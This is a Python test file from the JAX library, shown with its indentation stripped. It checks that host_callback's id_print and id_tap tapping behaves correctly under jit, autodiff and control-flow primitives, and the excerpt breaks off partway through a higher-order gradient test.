#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import itertools
import logging
import os
import re
import threading
import time
from typing import Callable, Optional, Sequence
import unittest
from unittest import skip, SkipTest
from absl.testing import absltest
from absl.testing import parameterized
import jax
from jax import ad_checkpoint
from jax import core
from jax.config import config
from jax import dtypes
from jax.experimental import host_callback as hcb
from jax.experimental import PartitionSpec as P
from jax.experimental import maps
from jax.experimental import pjit
from jax import lax
from jax import numpy as jnp
from jax._src import test_util as jtu
from jax import tree_util
from jax._src.lib import xla_client
from jax._src.lib import xla_bridge
xops = xla_client.ops
import numpy as np
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class _TestingOutputStream(object):
"""Use as `output_stream` for tests."""
def __init__(self):
self._output = []
self._test_method_name = None
def write(self, what: str) -> None:
print(f"output_stream[{self._test_method_name}]: {what}", end="")
self._output.append(what)
@property
def output(self):
return "".join(self._output)
@property
def output_sorted_by_device(self):
# Assume that the output is a sequence of strings including metadata
# and data, with metadata containing `device: xxx`
by_device = [] # each element is a pair (device, str_list)
for s in self._output:
m = re.match(r".*device: (\S+)", s)
if m:
by_device.append((m.group(1), []))
assert by_device, f"output does not include 'device:': {self._output}"
by_device[-1][1].append(s)
sorted_by_device = sorted(by_device, key=lambda x: x[0])
return "\n".join(itertools.chain(*[s[1] for s in sorted_by_device]))
def __str__(self):
return "TestingOutputStream"
def reset(self):
self._output = []
testing_stream = _TestingOutputStream()
def fun1(a):
"""Function used for several `id_tap` tests."""
y = hcb.id_print(a * 2., what="a * 2", output_stream=testing_stream)
y = hcb.id_print(y * 3., what="y * 3", output_stream=testing_stream, result=y)
return y ** 2 # Some computation to make the gradient interesting
def fun1_equiv(a): # Numerical equivalent of fun1
return (a * 2.) ** 2
def maybe_print(do_print: bool, arg, what: str, tap_with_device: Optional[bool] = False):
"""Conditionally print on testing_string"""
if do_print:
return hcb.id_print(arg, what=what,
output_stream=testing_stream, tap_with_device=tap_with_device)
else:
return arg
def local_devices():
# Tests require at most 2 devices.
return jax.local_devices()[:2]
ignore_jit_of_pmap_warning = partial(
jtu.ignore_warning, message=".*jit-of-pmap.*")
def assertMultiLineStrippedEqual(tst: jtu.JaxTestCase,
expected: str, what: str):
"""A variant that preprocesses the string to eliminate non-determinism in
floating point values, and several uninteresting id_tap primitive params.
"""
# Sometimes we get floating points in the output; we round them
def repl_floats(match_group):
matched = match_group.group(0)
if matched == ".": return matched
x = np.around(float(matched), decimals=2)
return f"{x:.2f}"
what = re.sub(r"\-?\d+\.[\-\def]*", repl_floats, what)
what = re.sub(r"output_stream=[^\]\n,]*,?", "", what)
what = re.sub(r"threshold=[^\]\n,]*,?", "", what)
what = re.sub(r"bwd=[^\]\n]*", "", what)
what = re.sub(r"out_trees=[^\]\n]*", "", what)
what = re.sub(r"fwd_jaxpr_thunk=[^\]\n]*", "", what)
what = re.sub(r"jvp_jaxpr_thunk=[^\]\n]*", "", what)
# Empty lines
what = re.sub(r"^\s*\n", "", what, flags=re.MULTILINE)
def repl_func(match_group):
matched = match_group.group(3)
if "function _print_consumer" in matched:
return match_group.group(1) + "=_print"
else:
return match_group.group(1) + "=..."
what = re.sub(r"((tap_func_)|(callback))=([^\]\n,]*),?", repl_func, what)
tst.assertMultiLineStrippedEqual(expected, what)
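# Illustrative example of the normalization above (hypothetical input):
#   "what: x1 12.3456 output_stream=<stream>, threshold=100,"
# becomes, after rounding floats and stripping uninteresting params,
#   "what: x1 12.35"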
def helper_set_hlo_dump():
flags_str = os.getenv("XLA_FLAGS", "")
import shutil
dump_dir = "/tmp/xla_dump"
os.environ["XLA_FLAGS"] = f"{flags_str} --xla_dump_to={dump_dir}"
if os.path.isdir(dump_dir):
logging.warning("Deleting old XLA dump directory %s", dump_dir)
shutil.rmtree(dump_dir)
logging.warning("Setting XLA dump directory %s", dump_dir)
# Clear any cached backends so new CPU backend will pick up the env var.
xla_bridge.get_backend.cache_clear()
def helper_print_optimized_hlo(fun, *args):
backend = xla_bridge.get_backend(platform=jtu.device_under_test())
c = jax.xla_computation(fun, backend=backend.platform)(*args)
print(re.sub(r", metadata.*", "",
backend.compile(c).hlo_modules()[0].to_string()))
def helper_log_ir(name,
f_jax,
*args,
num_partitions=None,
strip_metadata=False):
print(f"Jaxpr[{name}]: {jax.make_jaxpr(f_jax)(*args)}")
jax_comp = jax.xla_computation(f_jax, backend=jtu.device_under_test())(*args)
print(f"HLO[{name}]: {jax_comp.as_hlo_text()}")
backend = xla_bridge.get_backend()
if num_partitions is not None:
num_replicas = 1
device_assignment = np.array(jax.devices()[:num_partitions * num_replicas])
device_assignment = np.reshape(device_assignment, (-1, num_partitions))
use_spmd_partitioning = num_partitions > 1
compile_options = xla_bridge.get_compile_options(
num_replicas=num_replicas,
num_partitions=num_partitions,
device_assignment=device_assignment,
use_spmd_partitioning=use_spmd_partitioning,
)
else:
compile_options = None
jax_optimized_hlo = backend.compile(
jax_comp, compile_options).hlo_modules()[0].to_string()
if strip_metadata:
jax_optimized_hlo = re.sub(r", metadata.*", "", jax_optimized_hlo)
print(f"Optimized HLO[{name}] for "
f"platform {backend.platform}: {jax_optimized_hlo}")
prev_xla_flags = None
def setUpModule():
global prev_xla_flags
# This will control the CPU devices. On TPU we always have 2 devices
prev_xla_flags = jtu.set_host_platform_device_count(2)
# Reset to previous configuration in case other test modules will be run.
def tearDownModule():
prev_xla_flags()
def assertMultiDeviceOutputEqual(tst: jtu.JaxTestCase,
expected_2CPUs: str):
"""Check that the multi-device output is equal to the expected.
The tests run with 2 devices if available, otherwise 1 device.
We adjust the expected output here for 1 device.
Args:
expected_2CPUs: the expected output for 2 CPUs. If there is only
one device, this is trimmed to the first device. If the current
device_under_test is not a CPU, then we change the names
"""
expected = expected_2CPUs
if len(local_devices()) == 1:
start_device_1 = expected.find('device: cpu:1')
if start_device_1 >= 0:
expected = expected[0:start_device_1]
def replace_device_name(m) -> str:
return str(local_devices()[int(m.group(1))])
expected = re.sub(r'cpu:(\d+)', replace_device_name, expected)
what = testing_stream.output_sorted_by_device
return assertMultiLineStrippedEqual(tst, expected, what)
class HostCallbackTapTest(jtu.JaxTestCase):
def setUp(self):
super().setUp()
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
testing_stream.reset()
testing_stream._test_method_name = self._testMethodName
self.old_flags = os.getenv("XLA_FLAGS", "")
def tearDown(self) -> None:
if os.getenv("XLA_FLAGS") != self.old_flags:
os.environ["XLA_FLAGS"] = self.old_flags
xla_bridge.get_backend.cache_clear()
hcb.barrier_wait("HostCallbackTapTest.tearDown")
super().tearDown()
def test_tap_eval(self):
self.assertAllClose((5. * 2.) ** 2, fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: a * 2
10.00
what: y * 3
30.00""", testing_stream.output)
def test_tap_with_tuple_results(self):
def func2(x):
x1, y1 = hcb.id_print((x * 2., x * 3.), output_stream=testing_stream)
return x1 + y1
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00 9.00 )""", testing_stream.output)
def test_tap_with_dict_results(self):
def func2(x):
res = hcb.id_print(dict(a=x * 2., b=x * 3.), output_stream=testing_stream)
return res["a"] + res["b"]
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
{ a=6.00 b=9.00 }""", testing_stream.output)
def test_tap_with_result(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00 9.00 )""", testing_stream.output)
def test_tap_with_result_no_arg(self):
def tap_func(arg, transforms):
testing_stream.write(f"called tap_func with {arg}")
def func2(x):
x1 = hcb.id_tap(tap_func, None, result=x)
return x1
self.assertEqual(3., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "called tap_func with None",
testing_stream.output)
def test_tap_result_unused(self):
def tap_func(arg, transforms):
testing_stream.write(f"called tap_func with {arg}")
def func2(x):
hcb.id_tap(tap_func, None)
return x
self.assertEqual(3., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "called tap_func with None",
testing_stream.output)
def test_tap_with_device(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream,
tap_with_device=True)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiDeviceOutputEqual(self, """
device: cpu:0
( 6.00 9.00 )""")
def test_tap_eval_exception(self):
if not FLAGS.jax_host_callback_outfeed:
raise SkipTest("TODO: implement error handling for customcall")
# Simulate a tap error
def tap_err(*args, **kwargs):
raise ValueError("Some user message")
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile("There were exceptions during callback processing. Last one was:.*"
"ValueError: Some user message", re.DOTALL)):
func(0)
hcb.barrier_wait()
# We should have received everything before the error
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
def test_tap_empty(self):
"""Tap empty arrays."""
hcb.id_print((), output_stream=testing_stream)
hcb.id_print((1., np.ones((2, 0))), what="second", output_stream=testing_stream)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( )
what: second
( 1.00 [] )""", testing_stream.output)
def test_tap_jit_simple(self):
jit_fun1 = jax.jit(lambda x: 3. * hcb.id_print(
2. * x, what="here", output_stream=testing_stream))
self.assertAllClose(6. * 5., jit_fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: here
10.00""", testing_stream.output)
def test_tap_jit_no_invars(self):
def func(): # jitted function does not take arguments
return hcb.id_print(42, output_stream=testing_stream)
self.assertAllClose(42, jax.jit(func)())
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_multiple_invars(self):
def func(x1, x2):
return hcb.id_print(x1 + x2, output_stream=testing_stream)
self.assertAllClose(42, jax.jit(func)(40, 2))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_constant(self):
def func(x):
return hcb.id_print(42, result=x, output_stream=testing_stream)
self.assertAllClose(5, jax.jit(func)(5))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_sequence1(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
return hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
logging.info("%s: %s", self._testMethodName,
jax.make_jaxpr(func)(1))
logging.info("%s: %s", self._testMethodName,
jax.xla_computation(func, backend=jtu.device_under_test())(1).as_hlo_text())
self.assertEqual(2, jax.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2""", testing_stream.output)
def test_tap_jit2(self):
"""A sequence of JIT."""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
return x2
self.assertEqual(2, jax.jit(func)(1))
self.assertEqual(11, jax.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
def test_tap_jit_result_unused(self):
"""We can id_print even if we don't use the result."""
def func(x):
hcb.id_print(x, where="1", output_stream=testing_stream)
hcb.id_print(x + 1, where="2", output_stream=testing_stream)
return x + 1
self.assertEqual(2, jax.jit(func)(1))
self.assertEqual(11, jax.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
def test_tap_jit_nested(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
def func_nested(x):
x2 = hcb.id_print(x + 1, where="nested", output_stream=testing_stream)
return x2
x3 = jax.jit(func_nested)(x1)
return hcb.id_print(x3 + 1, where="3", output_stream=testing_stream)
self.assertEqual(3, jax.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: nested
2
where: 3
3""", testing_stream.output)
def test_tap_jit_devices(self):
"""Running on multiple devices."""
logging.info("%s: has devices %s", self._testMethodName, local_devices())
def func(x, device_id):
x1 = hcb.id_print(x, dev=str(device_id), output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, dev=str(device_id), output_stream=testing_stream)
return x2
for d in local_devices():
self.assertEqual(112, jax.jit(func, device=d, static_argnums=1)(111, d.id))
hcb.barrier_wait()
logging.info("%s: found output %s", self._testMethodName,
testing_stream.output)
self.assertEqual(
len(local_devices()), len(re.findall(r"111", testing_stream.output)))
self.assertEqual(
len(local_devices()), len(re.findall(r"112", testing_stream.output)))
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_pytree(self, with_jit=False):
def func(x, what=""):
"""Returns some pytrees depending on x"""
if what == "pair_1_x":
return (1, x)
elif what == "pair_x_2x":
return (x, 2 * x)
elif what == "dict":
return dict(a=2 * x, b=3 * x)
else:
assert False
tap_count = 0
def tap_func(a, _, *, what=""):
nonlocal tap_count
tap_count += 1
self.assertEqual(func(5, what), a)
transform = jax.jit if with_jit else lambda f: f
for what in ("pair_1_x", "pair_x_2x", "dict"):
transformed = transform(
lambda x: hcb.id_tap(
partial(tap_func, what=what),
func(x, what),
result=func(x * 2, what))
)(5)
self.assertEqual(func(10, what), transformed)
hcb.barrier_wait() # Wait for receivers to be done
self.assertEqual(3, tap_count)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_concurrent_{concurrent}",
concurrent=concurrent)
for concurrent in [True, False]))
def test_tap_multiple(self, concurrent=False):
"""Call id_tap multiple times, concurrently or in sequence. """
if concurrent and jtu.device_under_test() in ["cpu", "gpu"]:
# TODO(necula): if there is device side concurrency, outfeeds from
# different computations can be interleaved. For example, it seems that
# on GPU if multiple host threads run a jit computation, the multiple
# computations are interleaved on the GPU. This can result in the outfeed
# trains being interleaved, which will trigger an error.
# The solution is to fix on GPU the receiving logic so that we can outfeed
# the train as one tuple, and receive it one piece as a time. Then the
# trains should be atomic.
# See also b/160692602.
raise SkipTest("concurrent id_tap not supported on CPU, GPU")
received = set()
count = 5
def pause_tap(idx, _):
received.add(int(idx))
logging.info("Starting do_tap %s. Sleeping 1sec ...", idx)
time.sleep(0.3)
logging.info("Finish do_tap %s", idx)
def do_tap(idx):
jax.jit(lambda idx: hcb.id_tap(pause_tap, idx))(idx)
if concurrent:
threads = [
threading.Thread(
name=f"enqueue_tap_{idx}", target=do_tap, args=(idx,))
for idx in range(count)
]
[t.start() for t in threads]
[t.join() for t in threads]
else:
for idx in range(count):
do_tap(idx)
hcb.barrier_wait()
self.assertEqual(received, set(range(count)))
# TODO(necula): see comment for test_tap_multiple. Here we disable also
# on TPU, because the barrier_wait runs on all devices, including on the CPU
# where it would run into concurrency problems.
@skip("Concurrency not supported")
def test_tap_multiple_barriers(self):
"""Call barrier_wait concurrently."""
def pause_tap(*args, **kwargs):
logging.info("pause_tap waiting")
time.sleep(0.3)
logging.info("pause_tap done")
def long_run(x):
return hcb.id_tap(pause_tap, x)
jax.jit(long_run)(5.)
def try_barrier(idx):
logging.info("Starting test barrier %s", idx)
hcb.barrier_wait()
logging.info("Finished test barrier %s", idx)
threads = [
threading.Thread(
name=f"barrier_{idx}", target=try_barrier, args=(idx,))
for idx in range(3)
]
[t.start() for t in threads]
[t.join() for t in threads]
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_cond(self, with_jit=False):
"""A conditional"""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="cond_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="cond_f", result=x,
output_stream=testing_stream),
x2 + 1)
x5 = hcb.id_print(x4 + 1, where="end", output_stream=testing_stream)
return x5
transform = jax.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: cond_f
-1
where: end
4""", testing_stream.output)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_while_cond(self, with_jit=False):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(x):
x3 = hcb.id_print(x, where="w_b_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="w_b_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="w_b_f",
result=x, output_stream=testing_stream),
x3 + 1)
return hcb.id_print(x4, where="w_b_2", output_stream=testing_stream)
x10 = lax.while_loop(lambda x: x <= 3, body, x2)
res = hcb.id_print(x10, where="end", output_stream=testing_stream)
return res
transform = jax.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: w_b_1
2
where: w_b_t
3
where: w_b_2
3
where: w_b_1
3
where: w_b_f
-1
where: w_b_2
4
where: end
4""", testing_stream.output)
def test_tap_jit_while_pred_tap(self):
"""While with printing in the conditional."""
def func(x):
x1 = hcb.id_print(x, where="1")
x10 = lax.while_loop(lambda x: hcb.id_print(x < 3,
where="w_p",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x10, where="3", output_stream=testing_stream)
return res
self.assertEqual(3, jax.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self,
"""
where: w_p
True
where: w_b
2
where: w_p
True
where: w_b
3
where: w_p
False
where: 3
3""", testing_stream.output)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_scan_cond(self, with_jit=True):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(c, x):
x3 = hcb.id_print(x, where="s_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="s_t", output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="s_f", result=x, output_stream=testing_stream),
x3 + 1)
return (c, hcb.id_print(x4, where="s_2", output_stream=testing_stream))
_, x10 = lax.scan(body, x2, jnp.arange(3))
res = hcb.id_print(x10, where="10", output_stream=testing_stream)
return res
if with_jit:
func = jax.jit(func)
res = func(1)
self.assertAllClose(jnp.array([1, 2, 3]), res)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: s_1
0
where: s_t
1
where: s_2
1
where: s_1
1
where: s_f
-1
where: s_2
2
where: s_1
2
where: s_t
3
where: s_2
3
where: 10
[1 2 3]""", testing_stream.output)
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_shape_{shape}_dtype_{np.dtype(dtype).name}_nr_args={nr_args}",
shape=shape,
dtype=dtype,
nr_args=nr_args) for nr_args in [1, 2]
for shape in [(), (2,), (2, 3), (2, 3, 4)]
for dtype in jtu.dtypes.all))
def test_tap_jit_dtypes(self, nr_args=2, dtype=jnp.int16, shape=(2,)):
if dtype in (jnp.complex64, jnp.complex128, jnp.bool_):
raise SkipTest(f"host_callback not implemented for {dtype}.")
if dtype == np.bool_:
args = [self.rng().choice(a=[True, False], size=shape)]
else:
args = [jnp.arange(np.prod(shape), dtype=dtype).reshape(shape)]
if nr_args > 1:
args = args * nr_args
jit_fun1 = jax.jit(lambda xs: hcb.id_print(
xs,
a_new_test="************",
testcase_name=f"shape_{shape}_dtype_{dtype}_nr_args={nr_args}"))
res = jit_fun1(args)
self.assertAllClose(args, res, check_dtypes=True)
def test_tap_jit_large(self):
arg = jnp.arange(10000, dtype=jnp.int32).reshape((10, 10, 5, -1))
jax.jit(hcb.id_print)(arg)
def test_tap_jit_several_together(self):
arg = jnp.arange(50, dtype=jnp.int32).reshape((10, 5))
jax.jit(lambda x, y: hcb.id_print((x, y, x * 2.)))(arg, jnp.ones(100, dtype=jnp.int32))
def test_tap_jit_interleaving(self):
# Several jit's without data dependencies; they may interfere
count = 0 # Count tap invocations
nr_arrays = 5
def tap_func(arg, _):
nonlocal count
assert len(arg) == nr_arrays
count += 1
# This is the function that we'll run multiple times
def func(x, count):
for i in range(count):
x = hcb.id_tap(tap_func, [x + i for i in range(nr_arrays)])[-1]
return x
x = jnp.array(1, dtype=np.int32)
res = 0
for _ in range(10):
# No dependencies between the jit invocations
res += jax.jit(lambda x: func(x, 10))(x)
hcb.barrier_wait()
self.assertEqual(100, count)
def test_tap_jit_tap_exception(self):
if not FLAGS.jax_host_callback_outfeed:
raise SkipTest("TODO: implement error handling for customcall")
# Simulate a tap error
def tap_err(*args, **kwargs):
raise NotImplementedError
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
res = jax.jit(func)(0) # No error yet
with self.assertRaises(hcb.CallbackException):
hcb.barrier_wait()
# Even though the receiver thread raised, the main thread should still
# return 3.
self.assertEqual(3, res)
# We should have received all others
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
def test_tap_while(self):
"""Executing while, even without JIT uses compiled code"""
y = jnp.ones(5) # captured const
def func(x):
return lax.while_loop(
lambda c: c[1] < 5,
lambda c: (y, hcb.id_print(c[1], output_stream=testing_stream) + 1),
(x, 1))
func(y)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
1
2
3
4""", testing_stream.output)
def test_tap_jvp(self):
jvp_fun1 = lambda x, xt: jax.jvp(fun1, (x,), (xt,))
res_primals, res_tangents = jvp_fun1(jnp.float32(5.), jnp.float32(0.1))
self.assertAllClose(100., res_primals, check_dtypes=False)
self.assertAllClose(4., res_tangents, check_dtypes=False)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
transforms: ['jvp'] what: a * 2
( 10.00 0.20 )
transforms: ['jvp'] what: y * 3
( 30.00 0.60 )""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
what: a * 2
10.00
what: y * 3
30.00""", testing_stream.output)
def test_tap_grad_primal_unused(self):
# The output of id_print is not needed for backwards pass
def func(x):
return 2. * hcb.id_print(x * 3., what="x * 3",
output_stream=testing_stream)
grad_func = jax.grad(func)
arg = jnp.float32(5.)
jaxpr = str(jax.make_jaxpr(grad_func)(arg))
# making the Jaxpr does not print anything
hcb.barrier_wait()
treedef = tree_util.tree_structure(arg)
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, f"""
{{ lambda ; a:f32[]. let
b:f32[] = mul a 3.00
c:f32[] = outside_call[
arg_treedef={treedef}
callback=...
identity=True
transforms=()
] b
_:f32[] = mul c 2.00
d:f32[] = mul 1.00 2.00
e:f32[] = outside_call[
arg_treedef={treedef}
callback=...
identity=True
transforms=(('jvp',), ('transpose',))
] d
f:f32[] = mul e 3.00
in (f,) }}""", jaxpr)
else:
assertMultiLineStrippedEqual(self, f"""
{{ lambda ; a:f32[]. let
b:f32[] = mul a 3.00
c:f32[] = outside_call[
arg_treedef={treedef}
callback=...
identity=True
] b
_:f32[] = mul c 2.00
d:f32[] = mul 1.00 2.00
e:f32[] = mul d 3.00
in (e,) }}""", jaxpr)
assertMultiLineStrippedEqual(self, "", testing_stream.output)
testing_stream.reset()
res_grad = grad_func(arg)
hcb.barrier_wait()
self.assertAllClose(6., res_grad, check_dtypes=False)
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
what: x * 3
15.00
transforms: ['jvp', 'transpose'] what: x * 3
2.00""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
what: x * 3
15.00""", testing_stream.output)
def test_tap_grad_simple(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * hcb.id_print(y * 3., what="y * 3",
output_stream=testing_stream)
grad_func = jax.grad(func)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(2. * 5. * 6., res_grad, check_dtypes=False)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
what: y * 3
30.00
transforms: ['jvp', 'transpose'] what: y * 3
5.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
what: y * 3
30.00""", testing_stream.output)
def test_tap_grad_grad(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * (y * 3.)
grad_func = jax.grad(jax.grad(func))
# making the Jaxpr does not print anything
_ = jax.make_jaxpr(grad_func)(5.)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "", testing_stream.output)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(12., res_grad, check_dtypes=False)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00
transforms: ['jvp', 'transpose', 'jvp', 'transpose'] what: x * 2
2.00
transforms: ['jvp', 'transpose'] what: x * 2
3.00""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00""", testing_stream.output)
def test_tap_grad_pytree(self):
def func(x):
x4, x5 = hcb.id_print((x * 2., x * 3.), what="pair",
result=(x * 4., x * 5.),
output_stream=testing_stream)
return x4 + 2. * x5
x = jnp.float32(5.)
grad_func = jax.grad(func)
print(jax.make_jaxpr(grad_func)(x))
res_grad = grad_func(x)
self.assertAllClose(14., res_grad, check_dtypes=False)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
what: pair
( 10.00 15.00 )
transforms: ['jvp', 'transpose'] what: pair
( 0.00 0.00 )""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
what: pair
( 10.00 15.00 )""", testing_stream.output)
def test_tap_jvp_float0(self):
def f(x, yint):
x, yint = hcb.id_tap(lambda arg, _: arg, (x, yint))
return x * yint
res = jax.jvp(f, (2., 3), (0.2, np.zeros((), dtypes.float0)))
self.assertAllClose((6., 0.6), res)
def test_tap_grad_float0(self):
def func(x, yint):
x, yint = hcb.id_print((x, yint), what="pair", output_stream=testing_stream)
return x * yint
grad_func = jax.grad(func)
res_grad = grad_func(jnp.float32(5.), jnp.int32(2))
self.assertAllClose(2., res_grad, check_dtypes=False)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
what: pair
( 5.00 2 )
transforms: ['jvp', 'transpose'] what: pair
( 2.00 False )""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
what: pair
( 5.00 2 )""", testing_stream.output)
def test_tap_grad_float0_result(self):
# https://github.com/google/jax/issues/7340
# x is a Tuple[f32[2], s32[3]]
x = (np.array([.7, .8], dtype=np.float32),
np.array([11, 12, 13], dtype=np.int32))
def f_jax(x):
x = hcb.id_print(x, result=x, output_stream=testing_stream) # result= is important
return (3. * x[0], x[1])
def f_jax_vjp(x):
res, pullback = jax.vjp(f_jax, x)
g, = pullback((np.ones(x[0].shape, dtype=x[0].dtype),
np.zeros(x[1].shape, dtype=dtypes.float0)))
return g
g = f_jax_vjp(x)
self.assertAllClose(np.array([3., 3.], dtype=np.float32), g[0])
self.assertEqual(dtypes.float0, g[1].dtype)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )
transforms: ['jvp', 'transpose']
( [0.00 0.00] [False False False] )""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )""", testing_stream.output)
def test_tap_higher_order_grad_float0_result(self):
# https://github.com/google/jax/issues/7340
# x is a Tuple[f32[2], s32[3]]
x = (np.array([.7, .8], dtype=np.float32),
np.array([11, 12, 13], dtype=np.int32))
def f_jax(x):
x = hcb.id_print(x, result=x, output_stream=testing_stream) # result= is important
return (jnp.sin(x[0]), x[1])
def wrap_vjp(f, args, res_f_of_args):
# Given a function "f" and "args" return the f_vjp and args_vjp
def make_ct(res):
res_dtype = np.result_type(res)
if res_dtype == dtypes.float0:
return res
ct_dtype = core.primal_dtype_to_tangent_dtype(res_dtype)
return np.ones(np.shape(res), dtype=ct_dtype)
cts = tree_util.tree_map(make_ct, res_f_of_args)
def f_vjp(args, cts):
res, pullback = jax.vjp(f, *args)
return pullback(cts)
return (f_vjp, (args, cts))
res = f_jax(x)
hcb.barrier_wait()
